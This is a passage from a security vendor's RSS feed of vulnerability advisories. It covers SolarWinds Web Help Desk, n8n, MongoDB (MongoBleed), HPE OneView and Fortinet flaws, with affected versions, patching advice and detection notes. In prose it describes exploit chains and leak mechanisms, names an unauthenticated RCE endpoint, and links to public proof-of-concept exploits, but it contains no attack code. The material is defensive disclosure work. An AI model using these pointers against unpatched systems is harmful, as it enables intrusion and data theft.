versions </span><span style='font-size: undefined;'><span data-type='inlineCode'>12.8.8 Hotfix 1</span></span><span style='font-size: undefined;'> and below.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Customers are advised to update to the latest Web Help Desk version, </span><span style='font-size: undefined;'><span data-type='inlineCode'>2026.1</span></span><span style='font-size: undefined;'>, on an urgent basis outside of normal patching cycles.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance for SolarWinds Web Help Desk, please refer to the vendor’s security </span><a href="https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;">Exposure Command, InsightVM and Nexpose customers can assess their exposure to CVE-2025-40551, CVE-2025-40552, CVE-2025-40553 CVE-2025-40554 with remote vulnerability checks available in the Jan 28 content release.</p><h2 style="direction: ltr;">Updates</h2><ul><li><span style='font-size: undefined;'><strong>January 28, 2026:</strong></span><span style='font-size: undefined;'> Added reference to the Horizon3.ai technical analysis.</span></li><li><strong>January 29, 2026:</strong> Updated coverage information</li><li><span style='font-size: undefined;'><strong>February 3, 2026:</strong></span><span style='font-size: undefined;'> Updated Overview to add a reference to CVE-2025-40551 being added to the CISA KEV list.</span></li><li><span style='font-size: undefined;'><strong>February 13, 2026:</strong></span><span style='font-size: undefined;'> Updated Overview to add a reference to CVE-2025-40536 being added to the CISA KEV list.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554</link>
      <guid isPermaLink="false">blt0a948d7d63550e7b</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Emerging Threats]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 28 Jan 2026 14:53:08 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Ni8mare and N8scape flaws among multiple critical vulnerabilities affecting n8n]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On November 18, 2025, a patched release was </span><a href="https://github.com/n8n-io/n8n/commits/release/1.121.0/"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> for a critical unauthenticated file read vulnerability in </span><a href="https://n8n.io/"><span style='font-size: undefined;'>n8n</span></a><span style='font-size: undefined;'>, a popular piece of automation software. The advisory for this vulnerability, CVE-2026-21858, was subsequently </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> on January 7, 2026; the vulnerability holds a CVSS score of 10.0. If a server has a custom configured web form that implements file uploads with no validation of content type, an attacker can overwrite an internal JSON object to read arbitrary files and, in some cases, establish remote code execution. This vulnerability has been dubbed “Ni8mare” by the finders. </span></p><p><br/><span style='font-size: undefined;'>The finders, Cyera, published a </span><a href="https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858"><span style='font-size: undefined;'>technical blog post</span></a><span style='font-size: undefined;'> about the vulnerability on January 7, 2026, and a separate technical analysis and proof-of-concept (PoC) exploit were </span><a href="https://github.com/Chocapikk/CVE-2026-21858"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> by third-party security researcher Valentin Lobstein the same day. The Cyera writeup demonstrates </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg"><span style='font-size: undefined;'>CVE-2026-21858</span></a><span style='font-size: undefined;'>, while the third-party exploit also leverages </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp"><span style='font-size: undefined;'>CVE-2025-68613</span></a><span style='font-size: undefined;'>, an authenticated expression language injection vulnerability in n8n, for remote code execution. Additional authenticated vulnerabilities, tracked as </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp"><span style='font-size: undefined;'>CVE-2025-68613</span></a><span style='font-size: undefined;'>, </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-62r4-hw23-cc8v"><span style='font-size: undefined;'>CVE-2025-68668</span></a><span style='font-size: undefined;'>, </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-j4p8-h8mh-rh8q"><span style='font-size: undefined;'>CVE-2025-68697</span></a><span style='font-size: undefined;'>, and </span><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263"><span style='font-size: undefined;'>CVE-2026-21877</span></a><span style='font-size: undefined;'> can be chained with the unauthenticated vulnerability CVE-2026-21858 for code execution or arbitrary file write on specific affected versions of n8n.</span></p><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>In total there are five CVEs that n8n users should be aware of:</strong></span></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE Number</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Published Date</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSS</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Leveraged in PoC?</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-21858 (Ni8mare)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>01/07/2026</span></p></td><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21858"><span style='font-size: undefined;'>10.0</span></a><span style='font-size: undefined;'> (NVD score)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Certain form-based workflows are vulnerable to improper file handling that can result in arbitrary file read. When exploited, attackers can establish administrator-level access to n8n.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-21877</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>01/07/2026</span></p></td><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21877"><span style='font-size: undefined;'>9.9</span></a><span style='font-size: undefined;'> (NVD score)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Under certain conditions, authenticated n8n users may be able to cause untrusted code to be executed by the n8n service.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-68613</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12/19/2025</span></p></td><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-68613"><span style='font-size: undefined;'>8.8</span></a><span style='font-size: undefined;'> (NVD score)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A vulnerability in n8n’s expression evaluation system allows authenticated users to execute arbitrary system commands through crafted expressions in workflow parameters.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-68668 (N8scape)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12/26/2025</span></p></td><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-68668"><span style='font-size: undefined;'>9.9</span></a><span style='font-size: undefined;'> (NVD score)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A sandbox bypass vulnerability exists in the n8n Python Code node that uses Pyodide. An authenticated user with permission to create or modify workflows can exploit this vulnerability to execute arbitrary commands on the host system running n8n in the context of the service user.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-68697</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12/26/2025</span></p></td><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-68697"><span style='font-size: undefined;'>5.4</span></a><span style='font-size: undefined;'> (NVD score)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>In self-hosted n8n instances where the Code node runs in legacy (non-task-runner) JavaScript execution mode, authenticated users with workflow editing access can invoke internal helper functions from within the Code node. This permits reading and writing files on the host.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td></tr></tbody></table><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2026-21858: “Unauthenticated File Access via Improper Webhook Request Handling”</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is the primary access vector for the n8n exploit chain and holds a maximum CVSS score of 10.0. It is a critical unauthenticated file read vulnerability that occurs when custom web forms implement file uploads without validating the content type. By exploiting this flaw, an attacker can overwrite an internal JSON object to read arbitrary files from the server. This capability may be leveraged to forge an administrator session token and exploit subsequent authenticated vulnerabilities for code execution.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68613: “Remote Code Execution via Expression Injection”</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability is characterized as an authenticated expression language injection flaw. While it requires an established session to exploit, it can be chained with CVE-2026-21858 to achieve remote code execution. It affects n8n versions starting at 0.211.0 and below 1.20.4. Attackers can leverage this flaw by injecting malicious expression language commands once they have gained a foothold as an administrator.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68668: “Arbitrary Command Execution in Pyodide based Python Code node”</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affecting n8n versions between 1.0.0 and 2.0.0, this is an authenticated vulnerability used for secondary exploitation. Depending on the specific configuration of the affected version, it allows an attacker to execute arbitrary OS commands. Because it requires authentication, it is used on a case-by-case basis after an initial breach has compromised the management interface.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68697: “Legacy Code node enables file read/write in self-hosted n8n”</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-68697 is an authenticated vulnerability that facilitates arbitrary file read/write in the context of the n8n process when exploited. Per the advisory, systems are vulnerable when the Code node runs in legacy (non-task-runner) JavaScript execution mode. CVE-2025-68697 specifically impacts n8n versions ranging from 1.2.1 up to 2.0.0, though n8n version 1.2.1 and higher automatically prevents read/write access to the `.n8n` directory by default. As a result, exploitation of CVE-2025-68697 is likely to require a more bespoke strategy for each specific target, making it a less likely vulnerability to be exploited as a secondary chained bug with CVE-2026-21858.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2026-21877: “RCE via Arbitrary File Write”</strong></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability has a CVSS score of 9.9 and affects both self-hosted and cloud versions of n8n. It allows for remote code execution within n8n versions 0.123.0 through 1.121.3. Although it is an authenticated vulnerability, its high severity stems from its ability to grant an attacker full system control once they have bypassed initial authentication using the CVE-2026-21858 file read flaw.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running self-hosted instances of n8n should prioritize upgrading to a version at or above 1.121.0 immediately to remediate the unauthenticated initial access vulnerability CVE-2026-21858.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://github.com/n8n-io/n8n/security"><span style='font-size: undefined;'>vendor</span></a><span style='font-size: undefined;'>, the following versions are affected:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2026-21858:</strong></span><span style='font-size: undefined;'> Versions at or above 1.65.0 and below 1.121.0.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68613:</strong></span><span style='font-size: undefined;'> Versions at or above 0.211.0 and below 1.20.4.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68668:</strong></span><span style='font-size: undefined;'> Versions at or above 1.0.0 and below 2.0.0.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-68697:</strong></span><span style='font-size: undefined;'> Versions at or above 1.2.1 and below 2.0.0.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2026-21877:</strong></span><span style='font-size: undefined;'> Versions at or above 0.123.0 and below 1.121.3.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the vendor’s security advisories.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM and Nexpose customers can assess exposure to CVE-2026-21858, CVE-2025-68613, CVE-2025-68668, CVE-2025-68697, CVE-2026-21877 with vulnerability checks available in the January 9th content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>January 8, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>January 12, 2026:</strong></span><span style='font-size: undefined;'> Updated Rapid7 customers section to confirm checks shipped on January 9, 2026.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-ni8mare-n8scape-flaws-multiple-critical-vulnerabilities-affecting-n8n</link>
      <guid isPermaLink="false">bltfcfec469ceb18e13</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 08 Jan 2026 21:25:27 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[MongoBleed CVE-2025-14847: Critical Memory Leak in MongoDB Allowing Attackers to Extract Sensitive Data]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On December 19, 2025, MongoDB Inc. disclosed a critical new vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-14847"><span style='font-size: undefined;'>CVE-2025-14847</span></a><span style='font-size: undefined;'>, which has since been dubbed MongoBleed. This vulnerability is a high-severity unauthenticated memory leak affecting MongoDB, one of the world's most popular document-oriented databases. While initially identified as a data exposure flaw, the severity is underscored by the fact that it allows attackers to bypass authentication entirely to extract sensitive information directly from server memory. On December 26, 2025, public proof-of-concept (PoC) exploit code was published and on December 29th, 2025 exploitation in-the-wild has been </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>confirmed</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While CVE-2025-14847 is rated as a high-severity vulnerability, </span><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"><span style='font-size: undefined;'>CVSS 8.7</span></a><span style='font-size: undefined;'>, its impact is critical. Successful exploitation allows a remote, unauthenticated attacker to "bleed" uninitialized heap memory from the database server by manipulating Zlib-compressed network packets. This memory often contains high-value secrets such as cleartext credentials, authentication tokens, and sensitive customer data from other concurrent sessions. Because the vulnerability returns "uninitialized heap memory," an attacker cannot target specific credentials or data records with precision; they must instead rely on repeated exploitation attempts and chance to capture sensitive information.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The vulnerability specifically affects MongoDB servers configured to use the Zlib compression algorithm for network messages, which is a common configuration in many production environments. It affects a wide range of versions, including the 4.4, 5.0, 6.0, 7.0, and 8.0 branches. Older, End-of-Life (EOL) versions are also believed to be vulnerable but will not receive official patches, leaving users of legacy systems at significant continued risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of this writing, the public PoC has been successfully verified by Rapid7 Labs. Unlike scenarios where valid exploits are initially scarce, the exploit for MongoBleed is functional and reliable. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running self-managed MongoDB instances are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles. Given the nature of the leak, simply patching is insufficient; organizations are advised to also rotate all database and application credentials that may have been exposed prior to remediation.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-14847 affects a wide range of versions, including the 4.4, 5.0, 6.0, 7.0, and 8.0 branches. Older, End-of-Life (EOL) versions are also believed to be vulnerable but will not receive official patches, leaving users of legacy systems at significant continued risk. Organizations managing their own MongoDB instances should prioritize upgrading to the fixed versions released by </span><a href="https://jira.mongodb.org/browse/SERVER-115508"><span style='font-size: undefined;'>the vendor</span></a><span style='font-size: undefined;'> (e.g., 8.0.4, 7.0.16, 6.0.20, etc.) immediately. This is the only complete remediation for the vulnerability. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If an immediate upgrade is not feasible, or if the organization is running an End-of-Life (EOL) version that will not receive a patch, the risk can be effectively mitigated by disabling the Zlib network compressor in the server configuration. This prevents the specific memory allocation path used by the exploit.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition, because CVE-2025-14847 allows for the exfiltration of credentials and session tokens from server memory, patching alone is insufficient to ensure security. Administrators should assume that any secrets residing in the database memory prior to patching may have been compromised; therefore, all database passwords, API keys, and application secrets should be rotated immediately after the vulnerability is remediated. </span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2025-14847 with a vulnerability check expected to be available in today's (Dec 29) content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-14847, including a Suricata rule. </span></p><h2 style="direction: ltr;">Rapid7 observations</h2><p><span style='font-size: undefined;'>Rapid7 Labs has become aware of a new exploitation </span><a href="https://github.com/Hamid-K/mongobleed"><span style='font-size: undefined;'>tool</span></a><span style='font-size: undefined;'> that streamlines the extraction of sensitive data from vulnerable MongoDB instances. This utility introduces a graphical user interface that allows an attacker to either batch-dump 10MB of memory or monitor the extraction process via a live visual feed. Rapid7 Labs has confirmed the tool operates as described, as demonstrated in the video below.</span></p><figure><a href="https://play.vidyard.com/4RVMCpACpk7PSYA7eGZzKi" target="_blank"><img position="none" caption="Click to view in new tab" anchorLink="https://play.vidyard.com/4RVMCpACpk7PSYA7eGZzKi" alt="" target="_blank" width="570" max-width="570" height="360" src="https://play.vidyard.com/4RVMCpACpk7PSYA7eGZzKi.jpg"/></a><figcaption>Click to view in new tab</figcaption></figure><h2>Detection and Hunting</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Velociraptor </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Velociraptor published a </span><a href="https://docs.velociraptor.app/exchange/artifacts/pages/linux.detection.cve202514847.mongobleed/"><span style='font-size: undefined;'>Linux.Detection.CVE202514847.MongoBleed</span></a><span style='font-size: undefined;'> hunting artifact written by Eric Capuano designed to detect indicators related to CVE-2025-14847 memory leakage activity. This artifact enables defenders to proactively identify suspicious network or process behaviors consistent with mangled Zlib protocol abuse.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>December 29, 2025</strong></span><span style='font-size: undefined;'>: Initial publication</span></p></li><li><p style="direction: ltr;"><strong>December 29, 2025: </strong>"Rapid7 Observations" section added with video</p></li><li><span style='font-size: undefined;'><strong>December 29, 2025:</strong></span><span style='font-size: undefined;'> Added exploitation confirmation</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-mongobleed-cve-2025-1484-critical-memory-leak-in-mongodb-allowing-attackers-to-extract-sensitive-data</link>
      <guid isPermaLink="false">blt68e251952c702d4e</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 29 Dec 2025 14:16:48 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-37164: Critical unauthenticated RCE affecting Hewlett Packard Enterprise OneView]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p><span style='font-size: undefined;'>On December 17, 2025, Hewlett Packard Enterprise (HPE) published an </span><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&amp;docLocale=en_US#vulnerability-summary-1"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-37164"><span style='font-size: undefined;'>CVE-2025-37164</span></a><span style='font-size: undefined;'>, a CVSS 10.0 vulnerability in </span><a href="https://www.hpe.com/us/en/software/oneview.html"><span style='font-size: undefined;'>HPE OneView</span></a><span style='font-size: undefined;'>. The vulnerability, which was reported to HPE by security researcher Nguyen Quoc Khanh, facilitates unauthenticated remote code execution (RCE) on versions of HPE OneView before 11.0. Defenders are advised to prioritize upgrading to version 11.0 or applying the emergency hotfixes (</span><a href="https://myenterpriselicense.hpe.com/cwp-ui/product-details/HPE_OV_CVE_37164_Z7550-98077/-/sw_free"><span style='font-size: undefined;'>HPE OneView virtual appliance hotfix</span></a><span style='font-size: undefined;'>, </span><a href="https://support.hpe.com/connect/s/softwaredetails?collectionId=MTX-64daeb5ed0df44a0&amp;tab=releaseNotes"><span style='font-size: undefined;'>HPE Synergy hotfix</span></a><span style='font-size: undefined;'>) as soon as possible.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>OneView sits at a </span><a href="https://www.hpe.com/psnow/ebook/83292f43-c556-475c-8bec-3ac4d568d0f3"><span style='font-size: undefined;'>privileged control plane</span></a><span style='font-size: undefined;'> for enterprise infrastructure, so successful exploitation isn’t just about establishing remote code execution, it’s about gaining centralized control over servers, firmware, and lifecycle management at scale. The real concern here is exposure and trust assumptions. Management platforms are often deployed deep inside the network with broad privileges and minimal monitoring because they’re ‘supposed’ to be trusted. When an unauthenticated RCE shows up in that layer, defenders need to treat it as an assumed-breach scenario, prioritize patching immediately, and review access paths and segmentation.</span></p><p style="direction: ltr;"><em><strong>Update #1: A Rapid7 technical analysis of CVE-2025-37164 has been </strong></em><a href="https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis" target="_blank"><em><strong>published</strong></em></a><em><strong> on AttackerKB, and a Metasploit module is </strong></em><a href="https://github.com/rapid7/metasploit-framework/pull/20792" target="_blank"><em><strong>now available</strong></em></a><em><strong>.</strong></em></p><p><em><strong></strong></em></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt09d12aab28053668/69457773cedfd5f81341ec30/hpe_oneview_rce1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="hpe_oneview_rce1.png" asset-alt="hpe_oneview_rce1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt09d12aab28053668/69457773cedfd5f81341ec30/hpe_oneview_rce1.png" data-sys-asset-uid="blt09d12aab28053668" data-sys-asset-filename="hpe_oneview_rce1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="hpe_oneview_rce1.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Update #2: On January 7, 2026, CVE-2025-37164 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of </span><a href="https://www.cisa.gov/news-events/alerts/2026/01/07/cisa-adds-two-known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>known exploited vulnerabilities</span></a><span style='font-size: undefined;'> (KEV), based on evidence of active exploitation.</span></p><h2 style="direction: ltr;">Hotfix analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs has begun an initial analysis of the vendor-supplied hotfix </span><span style='font-size: undefined;'><span data-type='inlineCode'>HPE_OneView_CVE_37164_Z7550-98077.bin</span></span><span style='font-size: undefined;'>. This hotfix applies a new HTTP rule to the appliance’s webserver to block access to a specific REST API endpoint. This endpoint is </span><span style='font-size: undefined;'><span data-type='inlineCode'>/rest/id-pools/executeCommand</span></span><span style='font-size: undefined;'>. Initial inspection of the appliance code indicates this endpoint is reachable without authentication. Rapid7 Labs assesses with a high degree of confidence that this is the access vector for triggering the vulnerability and achieving remote code execution.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&amp;docLocale=en_US#vulnerability-summary-1"><span style='font-size: undefined;'>According to HPE</span></a><span style='font-size: undefined;'>, CVE-2025-37164 affects HPE OneView versions below 11.0, version 5.20 through version 10.20, unless a security hotfix (</span><a href="https://myenterpriselicense.hpe.com/cwp-ui/product-details/HPE_OV_CVE_37164_Z7550-98077/-/sw_free"><span style='font-size: undefined;'>HPE OneView virtual appliance hotfix</span></a><span style='font-size: undefined;'>, </span><a href="https://support.hpe.com/connect/s/softwaredetails?collectionId=MTX-64daeb5ed0df44a0&amp;tab=releaseNotes"><span style='font-size: undefined;'>HPE Synergy hotfix</span></a><span style='font-size: undefined;'>) has been applied.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance for HPE OneView, please refer to the vendor’s </span><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&amp;docLocale=en_US#vulnerability-summary-1"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2025-37164 with an unauthenticated vulnerability check expected to be available in today's (December 18) content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li><span style='font-size: undefined;'><strong>December 18, 2025:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><strong>December 19, 2025:</strong> Updated to link to the new Rapid7 technical analysis and Metasploit module for CVE-2025-37164.</li><li><span style='font-size: undefined;'><strong>January 8, 2026:</strong></span><span style='font-size: undefined;'> Updated Overview to add a reference to the CISA KEV list.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview</link>
      <guid isPermaLink="false">blt61ec88dfe52c4c74</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 18 Dec 2025 17:45:47 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical vulnerabilities in Fortinet CVE-2025-59718, CVE-2025-59719, CVE-2026-24858 exploited in the wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Update for CVE-2026-24858: On January 27, 2026, Fortinet disclosed </strong></em></span><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-060"><span style='font-size: undefined;'><strong>CVE-2026-24858</strong></span></a><span style='font-size: undefined;'><em><strong>, a critical unauthenticated vulnerability allowing authentication bypass via Fortinet’s cloud SSO. Confirmed as a net-new vulnerability rather than a patch bypass, it has been </strong></em></span><a href="https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios"><span style='font-size: undefined;'><strong>observed</strong></span></a><span style='font-size: undefined;'><em><strong> under active zero-day exploitation. The issue affects FortiAnalyzer, FortiManager, FortiOS, and FortiProxy. However, because Fortinet has deployed a fix to the cloud environment, a client-side patch is not required to prevent exploitation. Please refer to the ‘Mitigation guidance’ section for further details.</strong></em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A recently disclosed pair of vulnerabilities affecting Fortinet devices—</span><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-647"><span style='font-size: undefined;'>CVE-2025-59718 and CVE-2025-59719</span></a><span style='font-size: undefined;'>—are drawing urgent attention after </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>confirmation</span></a><span style='font-size: undefined;'> of their active exploitation in the wild. The vulnerabilities carry a critical CVSSv3 score and allow an unauthenticated remote attacker to bypass authentication using a crafted SAML message, ultimately gaining administrative access to the device. Current information indicates that the two CVEs have the same root cause and are differentiated by the products affected: </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-59719"><span style='font-size: undefined;'>CVE-2025-59719</span></a><span style='font-size: undefined;'> specifically affects FortiWeb, while </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-59718"><span style='font-size: undefined;'>CVE-2025-59718</span></a><span style='font-size: undefined;'> affects FortiOS, FortiProxy, and 